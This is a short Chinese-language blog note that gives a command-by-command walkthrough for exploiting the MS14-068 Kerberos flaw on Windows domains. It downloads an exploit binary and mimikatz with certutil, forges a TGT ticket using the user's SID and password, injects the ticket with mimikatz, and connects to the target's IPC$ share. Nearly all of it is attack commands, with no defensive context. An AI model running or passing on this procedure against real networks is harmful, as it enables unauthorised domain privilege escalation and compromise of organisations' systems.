【笔记】MS14-068伪造TGT凭据漏洞利用

发表于 更新于 阅读次数:

前言

MS14-068伪造TGT凭据漏洞利用

下载依赖

1
2
3
certutil -urlcache -split -f https://raw.githubusercontent.com/SecWiki/windows-kernel-exploits/refs/heads/master/MS14-068/MS14-068.exe
certutil -urlcache -split -f https://raw.githubusercontent.com/SecWiki/windows-kernel-exploits/refs/heads/master/MS14-068/mimikatz_trunk.zip
"C:\Program Files\7-Zip\7z.exe" x mimikatz_trunk.zip -omimikatz_trunk

获取目标用户SID

1
whoami /user

生成伪造的凭据

1
ms14-068.exe -s <sid> -d <ip> -u <username>@<domain> -p <password>
  • 在当前文件夹下会生成TGT_<username>@<domain>.ccache文件

查看内存中的所有凭据(可选)

1
klist

清除内存中的所有凭据(可选)

1
klist purge

导入凭据

TGT_<username>@<domain>.ccache:上一步骤生成的凭据文件

1
mimikatz\x64\mimikatz.exe kerberos::ptc TGT_<username>@<domain>.ccache

与目标建立连接

1
net use \\<ip>\ipc$

完成